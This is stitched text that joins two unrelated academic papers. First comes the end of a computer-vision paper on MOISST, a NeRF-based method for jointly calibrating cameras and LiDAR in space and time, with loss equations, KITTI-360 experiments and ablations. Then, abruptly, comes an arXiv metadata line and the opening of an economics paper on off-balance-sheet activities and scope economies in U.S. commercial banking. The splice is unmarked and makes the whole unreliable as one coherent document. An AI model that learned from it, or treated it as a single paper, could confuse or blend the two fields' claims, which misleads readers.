\[\mathcal{R}_{D}\left({}_{w}T^{i}(t^{n_{i}})\mid\Theta\right), \tag{4}\] with \(\mathcal{R}_{I}\) being the model inference and ray composition function that returns a RGB image prediction of frame \(n_{i}\) for sensor \(i\) and \(\mathcal{R}_{D}\) being equivalent to \(\mathcal{R}_{I}\) but returning rays depth instead of colors. By minimising the loss \(\mathcal{L}_{total}\) defined as: \[\mathcal{L}_{total} = \lambda_{C}\mathcal{L}_{C}+\lambda_{D}\mathcal{L}_{D}, \tag{5}\] \[\mathcal{L}_{C} = \sum_{i=1}^{S}\sum_{n_{i}=1}^{N_{i}}\left\|\mathcal{R}_{I}\left({} _{w}T^{i}(t^{n_{i}})\mid\Theta\right)-I^{n_{i}}\right\|_{2}^{2},\] (6) \[\mathcal{L}_{D} = \sum_{i=1}^{S}\sum_{n_{i}=1}^{N_{i}}\left\|\mathcal{R}_{D}\left({} _{w}T^{i}(t^{n_{i}})\mid\Theta\right)-D^{n_{i}}\right\|_{2}^{2}, \tag{7}\] with \(\lambda_{C}\), \(\lambda_{D}\) weighting hyper-parameters, we can estimate the optimal network parameters \(\hat{\Theta}\) satisfying: \[\hat{\Theta}=\underset{\Theta}{\text{argmin}}(\mathcal{L}_{total}). \tag{8}\] As explained by Wang _et al._[10], because the scene representation we use is fully differentiable, it is possible to optimize the input poses with gradient descent jointly with the radiance field parameters. The optimization objective becomes the following: \[\left\{\hat{\Theta},{}_{w}\hat{T}^{i}\right\}=\underset{\Theta,{}_{w}T^{i}}{ \text{argmin}}(\mathcal{L}_{total}). \tag{9}\] ### _MOISST Optimization formulation_ In this section, we introduce our novel optimization formulation for multi-sensor system spatiotemporal calibration. Considering a multi-sensor system such as a robot or an autonomous car, we know that the poses of each sensor observation are not independent, as it exists a rigid transformation between each sensor. Because we know the trajectory \(\mathcal{T}_{r}\) of the reference sensor \(r\), we can express the absolute pose of each remaining sensor according to sensor \(r\) (see equation 2). 
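To illustrate equations (1)-(2), here is a minimal sketch (ours, not the authors' code) of how the continuous reference trajectory can be built with SLERP/LERP and composed with a rigid extrinsic and a time offset to obtain the pose of another sensor. It assumes `numpy` and `scipy` are available, and it simply clamps query times at the trajectory bounds as a stand-in for the extrapolation described above.

```python
import numpy as np
from scipy.spatial.transform import Rotation as R, Slerp

def make_trajectory(times, poses_w_r):
    """Continuous reference trajectory T_r(t) from keyframe poses (eq. 1).

    times:     (N,) sorted timestamps of the reference sensor.
    poses_w_r: (N, 4, 4) world poses of the reference sensor at those timestamps.
    """
    rot_interp = Slerp(times, R.from_matrix(poses_w_r[:, :3, :3]))  # SLERP on rotations
    trans = poses_w_r[:, :3, 3]

    def T_r(t):
        t = np.clip(t, times[0], times[-1])      # simple stand-in for boundary extrapolation
        T = np.eye(4)
        T[:3, :3] = rot_interp(t).as_matrix()
        T[:3, 3] = [np.interp(t, times, trans[:, k]) for k in range(3)]  # LERP on translation
        return T

    return T_r

def pose_of_sensor_i(T_r, T_i_r, t_frame, delta_i):
    """World pose of sensor i at its frame time, following the composition of eq. (2)."""
    return T_r(t_frame + delta_i) @ T_i_r

# toy usage with two keyframes and an identity extrinsic prior
times = np.array([0.0, 1.0])
keyframes = np.stack([np.eye(4), np.eye(4)])
keyframes[1, :3, 3] = [1.0, 0.0, 0.0]            # the rig moved 1 m along x
T_r = make_trajectory(times, keyframes)
print(pose_of_sensor_i(T_r, np.eye(4), t_frame=0.4, delta_i=0.1))
```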
Substituting \({}_{w}T^{i}\) in equation 3 leads to the following formulation: \[\mathcal{R}_{I}\left(\mathcal{T}_{r}(t^{n_{i}}+\delta_{i})\,_{i}T^{r}\mid\Theta\right). \tag{10}\] Similar reasoning applies to the depth rendering function \(\mathcal{R}_{D}\). Our new formulation of the rendering functions can be integrated into the color loss of equation 6: \[\mathcal{L}_{C}=\sum_{i=1}^{S}\sum_{n_{i}=1}^{N_{i}}\left\|\mathcal{R}_{I}\left(\mathcal{T}_{r}(t^{n_{i}}+\delta_{i})\,_{i}T^{r}\mid\Theta\right)-I^{n_{i}}\right\|_{2}^{2}. \tag{11}\] We can replace the depth rendering function in the same manner in equation 7. This leads to our new optimization formulation: \[\left\{\hat{\Theta},{}_{i}\hat{T}^{r},\hat{\delta}_{i}\right\}=\underset{\Theta,\,{}_{i}T^{r},\delta_{i}}{\text{argmin}}(\mathcal{L}_{total}), \tag{12}\] with \({}_{i}\hat{T}^{r}\) and \(\hat{\delta}_{i}\) the only parameters to optimize along with the network weights. Indeed, as the trajectory \(\mathcal{T}_{r}\) is continuous over time, we can also optimize the time offsets \(\delta_{i}\). With the proposed method, we only have to optimize the extrinsic transformation between all sensors and the reference sensor, reducing the number of optimized parameters compared to the full set of frame poses as in equation 9. A summary of our proposal is shown in Fig. 2.

### _Optimization details_

#### Iii-C1 Additional losses for geometric consistency We add two more unsupervised losses using image patches to further improve the geometry of the NeRF model and the proper estimation of the calibration parameters. The first loss is the structural dissimilarity (DSSIM) \(\mathcal{L}_{SSIM}\)[31], which minimizes the difference in local 2D structures between the rendered and the input image. The second is the depth smoothness loss \(\mathcal{L}_{DS}\), also used by RegNeRF [32], which regularizes the depth variation in randomly selected patches of the images to reduce variation of the predicted depth. Our final loss function becomes: \[\mathcal{L}_{total}=\lambda_{C}\mathcal{L}_{C}+\lambda_{D}\mathcal{L}_{D}+\lambda_{SSIM}\mathcal{L}_{SSIM}+\lambda_{DS}\mathcal{L}_{DS} \tag{13}\] with \(\lambda_{C},\lambda_{D},\lambda_{SSIM},\lambda_{DS}\) the weight factors for each loss. #### Iii-C2 Network architecture We use an implicit scene representation similar to the nerfacto model of the Nerfstudio2 open-source framework. It is inspired by the proposal network introduced in MipNeRF 360 [33] with two proposal radiance fields and one final radiance field that outputs the color and density for the volumetric rendering. The proposals are used to sample points along the rays where the density is high. We use the hash grid introduced in Instant-NGP [26] for positional encoding and spherical harmonics for directional encoding. We found this model to be a good trade-off between speed and accuracy for our spatiotemporal calibration problem. Footnote 2: [https://docs.nerf.studio/en/latest/nerfology/methods/nerfacto.html](https://docs.nerf.studio/en/latest/nerfology/methods/nerfacto.html) #### Iii-C3 Regularization In BARF [12], the idea of low-to-high frequency release for the positional encoding allows smoothness in the scene, which helps the optimization of the poses to avoid local minima. With our architecture using the Instant-NGP backbone, we do not have a sinusoidal positional encoding, but a multi-resolution hash grid instead.
In order to mimic BARF, we introduce a weight decay to the hash encoder for a few epochs, before removing it, allowing higher-frequency information to be learned afterwards. We also wait a few epochs before applying the depth loss \(\mathcal{L}_{D}\), as we found that initializing the geometry through visual supervision only helps the whole system converge better.

Fig. 2: Overview of MOISST optimization framework. First, the model is initialized with rays generated using rough spatial and temporal calibration priors in addition to the reference frame trajectory. After each optimization step, the rays are regenerated and fed to the NeRF model. We then render RGB images and depth maps which are used along with the ground truth ones to compute the losses and propagate the gradients. A gradient descent algorithm is finally used to optimize both NeRF and calibration parameters.

#### Iii-C4 Spatiotemporal priors We use a spatial calibration prior to initialize the extrinsic parameters of the sensors. For the temporal shift, we set the initial estimate to 0, as we found our solution to be very robust to initial temporal miscalibration. An ablation on the sensitivity of our method to the initial priors is provided in Section IV-E.

## IV Experiments

We evaluate MOISST on the NVS training set from the recent KITTI-360 dataset [34], which involves difficult static outdoor scenarios with two forward- and two side-facing cameras and a top-mounted Velodyne HDL-64E LiDAR sensor. We report results on sequences 0, 1, 2 and 4 and consider the front-left camera as our reference sensor \(r\) for all experiments3. We apply \(\pm 50\) cm translation and \(\pm 5^{\circ}\) rotation offsets on all axes and \(\pm 100\) ms time offset to simulate spatial and temporal calibration errors, respectively. The geodesic distance and the classical \(L_{2}\)-norm are used to report the rotation and translation errors along all axes, and the average error over the last 10 epochs is reported for fairness. Footnote 3: Experiments are not performed on Sequence 3 as it contains missing captures of LiDAR scans. **Implementation details:** Given the sparser supervision signal from re-projected LiDAR depth maps, color and depth losses are balanced by \(\lambda_{C}=1\) and \(\lambda_{D}=20\). Furthermore, as radiance fields require initial optimization to learn depth through color supervision, the depth loss is applied after two epochs. Geometric consistency losses are empirically balanced by \(\lambda_{SSIM}=0.1\) and \(\lambda_{DS}=0.0001\). We use the Adam optimizer and train our network for 50 epochs in all experiments. We start with a learning rate of \(1\times 10^{-2}\) for the network parameters and \(5\times 10^{-5}\) for the spatial and temporal parameters, and exponentially decay to a factor of \(1\times 10^{-2}\) of the original learning rate. We apply a weight decay of \(1\times 10^{-6}\) on the network parameters, including the hash grid, then remove the weight decay of the hash grid after 5 epochs as explained in Section III-C3. We perform extensive evaluation of our solution under three different conditions: in Section IV-A with a scenario where we consider only spatial extrinsic noise, in Section IV-B with only temporal miscalibration, and finally in Section IV-C by taking into account both spatial and temporal calibration errors.
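As a rough, self-contained sketch of the optimization schedule described in the implementation details above (separate learning rates for network and calibration parameters, the loss weights of equation (13), exponential decay, delayed depth loss, and the hash-grid weight decay dropped after a few epochs), the PyTorch snippet below uses placeholder parameters and dummy losses; names such as `mlp_params`, `hash_params` and `calib_params` are ours, and a real training loop would of course render rays and compute the four losses from images and LiDAR depths.

```python
import torch

# placeholder parameter groups (stand-ins for the MLP, the hash grid and the calibration variables)
mlp_params = [torch.nn.Parameter(torch.randn(16, 16))]
hash_params = [torch.nn.Parameter(torch.randn(32))]
calib_params = [torch.nn.Parameter(torch.zeros(6)),   # extrinsic increments
                torch.nn.Parameter(torch.zeros(1))]   # time offset delta_i

optimizer = torch.optim.Adam([
    {"params": mlp_params, "lr": 1e-2, "weight_decay": 1e-6},
    {"params": hash_params, "lr": 1e-2, "weight_decay": 1e-6},
    {"params": calib_params, "lr": 5e-5},
])
# decay both learning rates to 1e-2 of their initial value over 50 epochs
scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, gamma=0.01 ** (1 / 50))

lam_C, lam_D, lam_SSIM, lam_DS = 1.0, 20.0, 0.1, 1e-4   # weights of eq. (13)

for epoch in range(50):
    if epoch == 5:
        optimizer.param_groups[1]["weight_decay"] = 0.0  # release the hash grid (Sec. III-C3)
    # dummy losses touching all parameters; placeholders for the real rendered-vs-observed losses
    loss_C = (mlp_params[0] ** 2).mean() + (hash_params[0] ** 2).mean() \
        + (calib_params[0] ** 2).sum() + (calib_params[1] ** 2).sum()
    loss_D = (hash_params[0] ** 2).mean()
    loss_SSIM, loss_DS = 0.1 * loss_C, 0.01 * loss_D
    loss = lam_C * loss_C + (lam_D * loss_D if epoch >= 2 else 0.0) \
        + lam_SSIM * loss_SSIM + lam_DS * loss_DS
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
    scheduler.step()
```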
### _Spatial Calibration_

In this section, we only consider a spatial error and remove the time offsets. We only optimize the spatial parameters. As we can see in Table I, MOISST estimates calibration parameters with low rotation error, below \(1^{\circ}\) in all sequences. As for translation, we are able to reach around 2 cm of error on the front-right camera, and between 7 cm and 14 cm for the LiDAR. The higher error in LiDAR translation calibration must be interpreted with care because of the limited precision of the provided ground truth, as explained in Section IV-D2.

### _Temporal Calibration_

In this section, we only consider a temporal error and remove the initial spatial error. We only optimize the temporal parameters. As shown by the results in Table II, our method is able to temporally calibrate the front-right camera with a precision under 1 ms, despite the high initial time offset of 100 ms or 200 ms, given that the camera captures at around 10 fps. The LiDAR's final temporal error is more variable depending on the scene, reaching around 15 ms at maximum. As mentioned previously, this higher error might be partially explained by the limited precision of the provided ground truth (see Section IV-D2).

### _Combined Calibration_

In this section, we consider the full initial error as described in Section IV. We run MOISST on all four cameras and the LiDAR of the KITTI-360 dataset. We can see in Table III that our method is able to calibrate the two side cameras, which look in completely different directions from our reference sensor. The performance varies depending on the sequence. For example, sequence 0 is captured in a very narrow road, giving the side cameras a small effective field of view, reducing the overlap and causing a drop in accuracy.

### _Discussions_

#### Iv-D1 Comparison with structure-based methods We wanted to compare our camera-LiDAR calibration results with the structure-based method from Yuan _et al._[7], but we could only obtain subpar results with their method on the dataset we use (we obtained a mean translation error of 60 cm and 4.08\({}^{\circ}\) of rotational error starting from a translation and rotational error of 50 cm and 5\({}^{\circ}\), respectively, on all axes). We found that it needed a denser point cloud from the LiDAR than what was provided in the KITTI-360 dataset in order to find reliable edge features in the scene. In addition, compared to our solution, this method is not able to perform camera/camera or LiDAR/LiDAR calibration, or to calibrate temporally. #### Iv-D2 Limitation of KITTI-360 LiDAR ground truth calibration In our experiments, we found that the extrinsic calibration between the front camera and the LiDAR provided by KITTI-360 might be accurate only up to a few centimetres. To show this, we performed the following experiment: we re-projected the LiDAR points into the image captured by the front camera according to 1) the provided ground truth calibration, and 2) the extrinsic calibration we obtained after optimizing the spatiotemporal parameters. We also provide an alignment comparison using NeRF-generated images at the same location as the LiDAR position on the vehicle to avoid parallax effects. Indeed, the LiDAR is positioned on top of the camera: some points re-projected on the images should not be visible from the camera position. Results are presented in Fig. 3 (more results in the supplementary video).

Fig. 3: Limitation of the KITTI-360 LiDAR ground truth calibration: we compare the alignment of re-projected 3D points from the LiDAR on the front image using the KITTI extrinsic calibration and our optimized extrinsic calibration. We also re-project the 3D points on a synthetic image generated with the same pose as the LiDAR on the vehicle, in order to avoid parallax effects.
Comparing the alignment between the re-projected 3D points on the real and synthetic images, we clearly see that our extrinsic calibration appears more accurate than the ground truth we use for comparison in this paper.

### _Ablation studies_

For the ablation studies, we only run our experiments on sequence 1. #### Iv-E1 Rotation vs Translation error By running training with solely rotation or translation errors of varying levels, we could observe that the initial rotation error has more impact on the final accuracy, as we did not get a satisfactory calibration when we introduced a 10\({}^{\circ}\) rotation error on all axes. The results are shown in Table IV. On the contrary, the translation error is well-handled, even with a 100 cm error set initially on all axes. #### Iv-E2 Spatiotemporal coupling We run an ablation study on the optimized parameters and report the results in Table V and Table VI. They show that if there are both spatial and temporal errors and only one of them is optimized, it is not possible to obtain a correct calibration, which means it is necessary to take both types of error into account. We can observe in Table VI that optimizing only the spatial parameters allows decent pose errors, showing that they partly compensate for the time offsets. This is possible because sequence 1 is mostly a straight line with the car driving at an almost constant speed. #### Iv-E3 Ablation on additional losses In Table VII, we demonstrate that the overall accuracy of our method increases when \(\mathcal{L}_{SSIM}\) and \(\mathcal{L}_{DS}\) are used. \(\mathcal{L}_{SSIM}\) has the largest impact on the performance as it helps the implicit scene representation learn a proper and sharp geometry from radiometric signals. It makes sense that better scene geometry improves the calibration accuracy, especially between LiDARs and cameras.

## V Conclusions and Future Work

In this paper, we presented MOISST, a novel approach based on implicit neural scene representations to spatially and temporally calibrate a multi-sensor system. The proposed approach has the advantage of being scalable to any number of cameras and LiDARs by relying on the trajectory of a single reference sensor. It does not require any targets or specific geometric structure within the scene to achieve accurate results. It is fully automatic and relies on gradient descent to optimize the calibration parameters. In the future, we expect to address some limitations of the method by calculating the poses of the reference sensor automatically instead of relying on the given ground truth, and by finding a way to bypass the need for priors for the other sensors. We would also like to add broader compatibility with other types of sensors, such as rolling-shutter cameras or distorted LiDARs, and the optimization of intrinsic parameters. Finally, we would like to implement multi-scene optimization, which should improve robustness by relying on more varied scenes to optimize a specific multi-sensor system.
2302.14603
Off-Balance Sheet Activities and Scope Economies in U.S. Banking
Propelled by the recent financial product innovations involving derivatives, securitization and mortgages, commercial banks are becoming more complex, branching out into many "nontraditional" banking operations beyond issuance of loans. This broadening of operational scope in a pursuit of revenue diversification may be beneficial if banks exhibit scope economies. The existing (two-decade-old) empirical evidence lends no support for such product-scope-driven cost economies in banking, but it is greatly outdated and, surprisingly, there has been little (if any) research on this subject despite the drastic transformations that the U.S. banking industry has undergone over the past two decades in the wake of technological advancements and regulatory changes. Commercial banks have significantly shifted towards nontraditional operations, making the portfolio of products offered by present-day banks very different from that two decades ago. In this paper, we provide new and more robust evidence about scope economies in U.S. commercial banking. We improve upon the prior literature not only by analyzing the most recent data and accounting for bank's nontraditional off-balance sheet operations, but also in multiple methodological ways. To test for scope economies, we estimate a flexible time-varying-coefficient panel-data quantile regression model which accommodates three-way heterogeneity across banks. Our results provide strong evidence in support of significantly positive scope economies across banks of virtually all sizes. Contrary to earlier studies, we find no empirical corroboration for scope diseconomies.
Jingfang Zhang, Emir Malikov
2023-02-26T22:56:20Z
http://arxiv.org/abs/2302.14603v1
# Off-Balance Sheet Activities and Scope Economies in U.S. Banking+ ###### Abstract Propelled by the recent financial product innovations involving derivatives, securitization and mortgages, commercial banks are becoming more complex, branching out into many "nontraditional" banking operations beyond issuance of loans. This broadening of operational scope in a pursuit of revenue diversification may be beneficial if banks exhibit scope economies. The existing (two-decade-old) empirical evidence lends no support for such product-scope-driven cost economies in banking, but it is greatly outdated and, surprisingly, there has been little (if any) research on this subject despite the drastic transformations that the U.S. banking industry has undergone over the past two decades in the wake of technological advancements and regulatory changes. Commercial banks have significantly shifted towards nontraditional operations, making the portfolio of products offered by present-day banks very different from that two decades ago. In this paper, we provide new and more robust evidence about scope economies in U.S. commercial banking. We improve upon the prior literature not only by analyzing the most recent data and accounting for bank's nontraditional off-balance sheet operations, but also in multiple methodological ways. To test for scope economies, we estimate a flexible time-varying-coefficient panel-data quantile regression model which accommodates three-way heterogeneity across banks. Our results provide strong evidence in support of significantly positive scope economies across banks of virtually all sizes. Contrary to earlier studies, we find no empirical corroboration for scope diseconomies. **Keywords**: bank, cost subadditivity, nontraditional banking, off-balance sheet, product scope, scope economies **JEL Classification**: G21, L25, D24 Introduction Just like in other industries, executive managers in banking must choose the optimal scope of operations. Despite the long-lasting implications of this strategic choice for firm performance, the dichotomy between operational "focus" and breadth remains unsettled from the corporate strategy perspective. The common arguments for limited-scope operations a la Skinner (1974a,b) usually feature cost and quality benefits associated with more specialized expertise and tacit knowledge, lessened complexity, diminished technological uncertainty, etc. On the other hand, there may be a strong incentive to diversify revenue streams by broadening the firm's product mix in order to capitalize on potential scope-driven cost savings and thereby increase firm value (see Panzar and Willig, 1981; Rumelt, 1982; Villalonga, 2004). When it comes to commercial banking, leveraging operational scope and breadth thereof continues to play a vital role in operations management. The scope of bank operations has also been a subject of intense policy debate, thereby expanding practical importance of understanding the relation between operational scope and bank performance beyond industry managers and stakeholders. Namely, the financial crisis of 2007-2008 and the ensuing Great Recession turned attention of policy-makers and academics alike onto large "too-big-to-fail" (TBTF) commercial banks and the serious systemic risks that they pose. 
The emergence of behemoth banks due to deregulation as well as technological innovations (including those in information technologies) has given rise to concerns about the costs that such "systemically important financial institutions" impose on the economy and fueled policy debates about whether banks should be subject to size limitations, even including the talks of break-up. These policy discussions have led to the enactment of new financial regulations such as the Dodd-Frank Wall Street Reform and the Consumer Protection Act of 2010 that seek to eliminate the TBTF doctrine by setting restrictions on the scale and scope of bank operations. However, the potential cost savings associated with operating at a large scale with a more diversified scope of revenue-generating activities, which are to be forgone owing to the new regulations, have been by and large neglected in these policy discussions. Large banks may derive such cost efficiency benefits from their ability to offer financial services at lower average cost due to (_i_) "scale economies" driven by the increasing returns to scale as well as (_ii_) their unique position to innovate and expand the scope of offered financial products and thereby economize costs ("scope economies") via input complementarities and positive spillovers (see Markides and Williamson, 1994; Milgrom and Roberts, 1995) as well as, in the case of commercial banking, risk diversification across different products (e.g., Rossi et al., 2009). In theory, these cost savings are passed onto customers in the form of lower net interest margins. This raises an important policy and research question about significance of the trade-off between lower systemic risk pursued by the newly enacted regulations and the cost savings that banks may be forced to forgo as a result. Both have non-negligible implications for consumer welfare. It is therefore imperative to investigate the prevalence of scale and scope economies in banking in order to not only shed light on potential unintended consequences of the financial reforms already put in place but also to inform future policies and regulations. This information also can help banks in formulating optimal product-scope operational strategies. While studies of scale economies in commercial banking are many, the attempts to measure _scope economies_ are however scant and outdated. The latter is especially lacking given the introduction of many "nontraditional" financial product innovations involving derivatives, securitization and mortgages by the large banks in the past two decades that have allowed them to expand the scope of their revenue-earning operations. The objective of this paper is to fill in this gap. Early studies of scale economies in banking date as far back as Berger et al. (1987), Mester (1987, 1992) and Hughes and Mester (1993, 1998) to name a few, and with the passage of new financial reforms, this body of research has only been growing. No matter the methods employed, most recent studies find empirical evidence in support of the statistically significant increasing returns to scale in the U.S. banking sector. Some find significant scale economies mostly for large commercial banks (e.g., Wheelock and Wilson, 2012; Hughes and Mester, 2013; Restrepo-Tobon and Kumbhakar, 2015); others find economies of scale for medium and small banks as well (e.g., Malikov et al., 2015; Restrepo-Tobon et al., 2015; Wheelock and Wilson, 2018). 
With the sole exception,1 there however have been virtually no attempt to investigate product scope economies in banking over the past two decades despite the drastic transformations that this sector has undergone during that time. This perhaps can be attributed to the lack of empirical evidence in support of statistically and/or economically significant scope economies among U.S. commercial banks documented in the 1980s and 1990s; e.g., see Berger et al. (1987), Mester (1987), Hughes and Mester (1993), Pulley and Braunstein (1992), Ferrier et al. (1993), Pulley and Humphrey (1993), Jagtiani et al. (1995), Jagtiani and Khanthavit (1996), Wheelock and Wilson (2001). It makes scope economies in the present-day banking sector be a seriously overlooked issue because the technological advancements along with regulatory changes have restructured the U.S. banking industry dramatically, especially since the passage of the Gramm-Leach-Bliley Act in 1999, which largely lifted the restrictions prohibiting the consolidation of commercial banks, investment banks, securities firms and insurance companies. U.S. banks have since experienced a drastic shift from traditional banking activities (viz., issuance of loans) towards the nontraditional activities such as investment banking, venture capital, security brokerage, insurance underwriting and asset securitization (DeYoung and Torna, 2013), and the portfolio of products offered by the modern banks is very different from that two decades ago, underscoring the importance of our study. Footnote 1: To our knowledge, Yuan and Phillips (2008) who explicitly recognize the role of nontraditional banking activities (namely, insurance) is the only attempt at measuring scope economies in the U.S. banking post 2000. Their analysis looks at a single nontraditional operation and stops at 2005, which obviously excludes the most relevant period after the structural-change-inducing financial crisis. While nontraditional banking operations are usually associated with banks' all other non-interest fee-generating activities related to participating in capital markets, the off-balance sheet banking represents one of the major forms of such nontraditional activities. It chiefly consists of contingent claims/contracts that involve obligations to lend or provide funds should the contingency be realized and, unlike the traditional interest-income-centered transactions, these off-balance sheet activities are not recorded on the bank's balance sheet (Hassan, 1993; Hassan and Sackley, 1994). For example, an interest-earning loan is considered an asset on the bank's balance sheet, whereas a promise to make a loan is an off-balance sheet item since it involves only a _potential_ funding obligation in the future, albeit, for which the bank earns a fee. Broadly, off-balance sheet items can be categorized into four groups including guarantees, commitments, market-related activities, and advisory or management functions (e.g., see Perera et al., 2014). Such off-balance sheet banking operations are well-documented to substantially influence banks' financial performance including profitability and risk profiles (e.g., Siroh, 2004; Laeven and Levine, 2007; Apergis, 2014), and omitting these revenue-earning operations in the analysis of banking technology may lead to erroneous inference and conclusions due to misspecification (see Clark and Siems, 2002; Rime and Stiroh, 2003; Casu and Girardone, 2005; Lozano-Vivas and Pasiouras, 2010). 
When testing for scope economies, we therefore recognize off-balance sheet operations as another one of the bank's revenue-generating outputs. In this paper, we contribute to the literature by providing new and more robust evidence about scope economies in U.S. commercial banking. We improve upon the prior literature not only by analyzing the most recent and relevant data (2009-2018) and accounting for bank's nontraditional non-interest-centered operations, but also in multiple methodological ways as follows. In a pursuit of robust estimates of scope economies and statistical inference thereon, we estimate a flexible, yet parsimonious, time-varying-coefficient panel-data quantile regression model which accommodates (_i_) distributional heterogeneity in the cost structure of banks along the size of their costs, (_ii_) temporal variation in cost complementarities and spillovers due to technological change/innovation, and (_iii_) unobserved bank heterogeneity (e.g., latent management quality) that, if unaccounted, confounds the estimates. Our analysis is structural in that we explicitly estimate a model of bank cost structure which facilitates the measurement of counterfactual costs necessary to test for scope economies. By employing a quantile approach, we are able to capture distributional heterogeneity in the bank cost structure. Unlike the traditional regression models that focus on the conditional mean only, quantile regression provides a complete description of the relationship between the distribution of bank costs and its determinants. Since banks of varying size/scale are highly heterogeneous in their operations (e.g., see Wheelock and Wilson, 2012), it is reasonable to expect that large- and small-scale banks exhibit different scope-driven potential for cost saving (if any) and, therefore, there remains much untapped benefit of examining scope economies in banking via quantile analysis. Thus, contrary to all prior studies of scope economies in banking which provide evidence solely for _average_ costs via conventional conditional-mean regressions, we focus our analysis on conditional _quantiles_ of the bank cost distribution, with the bank's operating cost being a good proxy for its size/scale. Not only does this approach enable us to accommodate potential heterogeneity in the prevalence of scope economies among banks of different sizes, but it is also more robust to the error distributions including the presence of outliers in the data. Furthermore, it exhibits a useful equivariance property thereby letting us avoid biases in the scope economies computations that numerous earlier studies suffer from (to be discussed later). To operationalize our analysis, we employ the recently developed quantile estimator (Machado and Santos Silva, 2019) that we extend to allow temporal variation of unknown form in the parameters in order to flexibly capture the impact of technological innovations on bank operations and costs. Our empirical results provide strong evidence in support of statistically significant scope economies across banks virtually of all sizes in the U.S. banking sector. Among banks between the bottom 10th and top 90th percentiles of the cost distribution, 92% or more exhibit positive economies of scope. The prevalence of significant scope economies in median banks is 99%. Even under the alternative model specifications that produce smaller point estimates, the evidence in support of scope economies in U.S. 
banking remains strong, with at least 89% of mid-cost banks found to enjoy product-scope-driven cost savings. We also find no empirical corroboration for scope _dis_economies. Overall, our findings are in stark contrast with earlier studies. The rest of the paper unfolds as follows. Section 2 discusses the theoretical framework. Section 3 describes our econometric model. Data are discussed in Section 4, followed by Section 5 that reports the empirical results. We then conclude in Section 6. ## 2 Theory of Multi-Product Costs In order to test if there is an untapped cost savings potential for commercial banks due to scope economies, we need to formally model their cost structure. Following the convention in the banking literature, we do so using the dual cost approach. Not only is this approach convenient because it facilitates the direct measurement of the bank's costs via the estimated dual cost function necessary for testing for scope economies, but it also does not require the use of input quantities during the estimation (unlike in the primal production approach) which can lead to simultaneity problems since input allocations are the bank's endogenous decision whereas input prices are widely accepted as being exogenously determined owing to competition in the factor market including that for deposits. A model of bank costs calls for specification of the outputs and inputs of bank production. Given the bank's core functions as a financial intermediary, most studies in the literature adopt Sealey and Lindley's (1977) "intermediation approach" which focuses on the bank's production of intermediation services and the associated costs inclusive of both the interest and operating expenses. In this paradigm, the revenue-generating financial assets such as loans and trading securities are conceptualized as outputs, whereas inputs are typically specified to include labor, physical capital, deposits and other borrowed funds as well as equity capital (for an excellent review, see Hughes and Mester, 2015). Given the recent industry trends and the growing importance of nontraditional income-earning activities that banks engage in, we also include an output measure of non-interest off-balance sheet income. Together with loans and securities, this makes a total of \(M=3\) outputs. Concretely, we formalize the bank's cost structure via the following multi-product dual variable cost function: \[\mathcal{C}_{t}(\mathbf{Y},\mathbf{W},\mathbf{K})=\min_{\mathbf{X}\geq\mathbf{0}}\left\{\mathbf{X}^{\prime}\mathbf{W}\mid(\mathbf{X},\mathbf{K})\text{ can produce }\mathbf{Y}\text{ at time }t\right\}, \tag{2.1}\] where the arguments of cost function \(\mathcal{C}_{t}(\cdot)\) are the output quantities \(\mathbf{Y}\in\Re_{+}^{M}\), variable input prices \(\mathbf{W}\in\Re_{+}^{J}\) and fixed input quantities \(\mathbf{K}\in\Re_{+}^{P}\); and \(\mathbf{X}\in\Re_{+}^{J}\) is the vector of variable input quantities. Importantly, the cost function in (2.1) is time-varying, thereby accommodating the evolution of the bank cost structure over time in the face of technological advancements and regulatory changes. The multi-product firm's cost structure is said to exhibit scope economies if its average cost is decreasing in the number of outputs/operations (Panzar and Willig, 1981).
Commercial banks may achieve such cost savings by spreading fixed costs (e.g., branch costs and data processing costs) over the more diversified output mix (fixed asset amortization) which now, more often than not, includes nontraditional off-balance sheet operations. Scope economies may also arise from positive spillovers via the (re)use of "public inputs" such as client credit information and customer relations as well as intangible assets including tacit knowledge and know-hows. Complementarities across different products can play a big role too. For example, some off-balance sheet operations such as loan commitments (which generate income for banks via fees) essentially represent a technological expansion of traditional lending at little added cost. At the same time, they can help banks expand the scope of their customer relationship with all the cost-saving informational gains that come with it (Berger and Udell, 1995; Das and Nanda, 1999; Degryse and Van Cayseele, 2000). Banks can also reuse the information gathered when issuing loans to reduce the searching or monitoring requirements of the off-balance sheet activities. To test for the potential for scope-driven cost savings, we use an expansion-path measure of subadditivity of the bank's cost function a la Berger et al. (1987), with the rationale being that subadditivity sheds light on scope economies, the presence of which is a necessary condition for the former (see Baumol et al., 1982; Evans and Heckman, 1984). Specifically, the subadditivity measure relies on comparison of the costs of smaller _multi_-output banks of _differential_ degrees of specialization with the cost of a larger, more diversified bank.2 Intuitively, this approach zeroes in on scope economies from a perspective of relative--as opposed to absolute--notion of revenue diversification. Then, for some distribution weights \(0\leq\omega_{m}^{\kappa}\leq 1\) such that \(\sum_{\kappa}\omega_{m}^{\kappa}=1\) for all \(m=1,2,3\) and \(\kappa\in\{A,B,C\}\), the bank is said to enjoy scope economies at time \(t\) if Footnote 2: While preserving the equality of total output quantities on both sides, of course. \[\sum_{\kappa\in\{A,B,C\}}\mathcal{C}_{t}\big{(}\omega_{1}^{\kappa}Y_{1},\omega_{2}^{\kappa}Y_{2},\omega_{3}^{\kappa}Y_{3}\big{)}-\mathcal{C}_{t}\big{(}Y_{1},Y_{2},Y_{3}\big{)}>0, \tag{2.2}\] where we have suppressed all arguments of the cost function besides outputs. While the above methodology deviates from the conventional definition of scope economies (Baumol et al., 1982) which relies on the comparison of the cost of producing outputs individually with the cost of their joint production, whereby the bank is said to enjoy scope economies if \(\mathcal{C}_{t}(Y_{1},0,0)+\mathcal{C}_{t}(0,Y_{2},0)+\mathcal{C}_{t}(0,0,Y_{3})-\mathcal{C}_{t}(Y_{1},Y_{2},Y_{3})>0\), it is both more realistic and robust. This is so because it does not require computation of the counterfactual cost of producing each output separately by a fully specialized _single_-output bank, which naturally suffers from "excessive extrapolation" (Evans and Heckman, 1984; Hughes and Mester, 1993) since the counterfactuals require extrapolation of the estimated multi-output cost function to its boundaries corresponding to the _non-existent_ single-output specializations. Also, the conventional measure of scope economies is just a special case of (2.2) with a pair of weights taking zero values for each counterfactual bank.
